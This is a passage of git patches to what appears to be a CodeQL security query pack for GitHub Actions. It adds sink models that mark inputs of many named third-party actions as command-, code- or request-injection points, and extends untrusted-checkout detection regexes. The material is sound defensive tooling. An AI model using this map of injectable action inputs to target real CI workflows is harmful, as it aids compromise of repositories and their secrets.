githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml new file mode 100644 index 00000000000..1bcf8e7ce7a --- /dev/null +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml new file mode 100644 index 00000000000..81706744568 --- /dev/null +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml new file mode 100644 index 00000000000..aeca6db0d98 --- /dev/null +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml new file mode 100644 index 00000000000..b9358bd2d69 --- /dev/null +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "input.install", "command-injection"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml new file mode 100644 index 00000000000..a18319954e3 --- /dev/null +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 3db3e9cf66c..f46c40a8f9c 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml new file mode 100644 index 00000000000..219de80c39e --- /dev/null +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml new file mode 100644 index 00000000000..dc3c2739e87 --- /dev/null +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml new file mode 100644 index 00000000000..30679750f13 --- /dev/null +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"] + - ["nick-fields/retry", "*", "input.command", "command-injection"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml new file mode 100644 index 00000000000..c600e7a93b6 --- /dev/null +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/graphql-action", "*", "input.query", "request-forgery"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml new file mode 100644 index 00000000000..ed9088c9f56 --- /dev/null +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/request-action", "*", "input.route", "request-forgery"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml new file mode 100644 index 00000000000..988c3d5e674 --- /dev/null +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml new file mode 100644 index 00000000000..91a3382348c --- /dev/null +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml new file mode 100644 index 00000000000..d9d15dc94b2 --- /dev/null +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml new file mode 100644 index 00000000000..6bc0467692d --- /dev/null +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml new file mode 100644 index 00000000000..62dea47d818 --- /dev/null +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml new file mode 100644 index 00000000000..525d0199859 --- /dev/null +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection"] + - ["py-actions/flake8", "*", "input.path", "command-injection"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] + - ["py-actions/flake8", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml new file mode 100644 index 00000000000..5aac0f89432 --- /dev/null +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml new file mode 100644 index 00000000000..d32c6509ad7 --- /dev/null +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml new file mode 100644 index 00000000000..c4ea326ecef --- /dev/null +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -0,0 +1,24 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml new file mode 100644 index 00000000000..7213a39f992 --- /dev/null +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml new file mode 100644 index 00000000000..3207c6d7521 --- /dev/null +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml new file mode 100644 index 00000000000..d00d78bcba8 --- /dev/null +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml new file mode 100644 index 00000000000..e2813105bdc --- /dev/null +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 0190ffd9ad7..d6ba27a5079 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 87610c43440..413f4f3058b 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml new file mode 100644 index 00000000000..42361b203e0 --- /dev/null +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml new file mode 100644 index 00000000000..474b36186b0 --- /dev/null +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["snow-actions/eclint", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml new file mode 100644 index 00000000000..73b93dbb88a --- /dev/null +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml new file mode 100644 index 00000000000..4138b97f0fb --- /dev/null +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml new file mode 100644 index 00000000000..1bcbac476a8 --- /dev/null +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tibdex/backport", "*", "input.body_template", "code-injection"] + - ["tibdex/backport", "*", "input.head_template", "code-injection"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection"] + - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 21a0b479ef5..7c681d8a64b 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -19,4 +19,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml new file mode 100644 index 00000000000..3072c6f54fd --- /dev/null +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml new file mode 100644 index 00000000000..5fe53ea3d07 --- /dev/null +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml new file mode 100644 index 00000000000..5e87f6c3b94 --- /dev/null +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] + - ["veracode/veracode-sca", "*", "input.path", "command-injection"] + - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml new file mode 100644 index 00000000000..dbe5d2d542d --- /dev/null +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"] + - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"] + - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml new file mode 100644 index 00000000000..9ecbdb6329f --- /dev/null +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml new file mode 100644 index 00000000000..10920eb6bf5 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml new file mode 100644 index 00000000000..a1d49af0845 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad2..33d6260203e 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } } From fe1bf58ae537271980678fc34b9237e5a27fc4a9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:05 +0100 Subject: [PATCH 0097/1267] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index c9ad93d18b2..9ea69477675 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -37,6 +37,7 @@ predicate containsHeadRef(string s) { Utils::normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment. "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. @@ -82,7 +83,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and + w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From aa37339deb22e8ac1d24e7305659342be3bac1a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:40 +0100 Subject: [PATCH 0098/1267] Apply suggestions from code review --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 143e89512fe..19d1924731a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -5,7 +5,6 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-] expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index b05dd852dbf..9a97a1c45b4 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -47,7 +47,7 @@ private newtype TAstNode = ) ) or - // if's conditions do not need to be delimted with ${{}} + // `if`'s conditions do not need to be delimted with ${{}} exists(YamlMapping m | m.maps(key, value) and key.(YamlScalar).getValue() = ["if"] and From e726f9fff12fb35b5f0b1287aa87e0e1e5fb7136 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:24:32 +0100 Subject: [PATCH 0099/1267] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 9ea69477675..4a0a4b6ade6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -48,6 +48,26 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. "\\benv\\.GITHUB_HEAD_REF\\b", + + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + 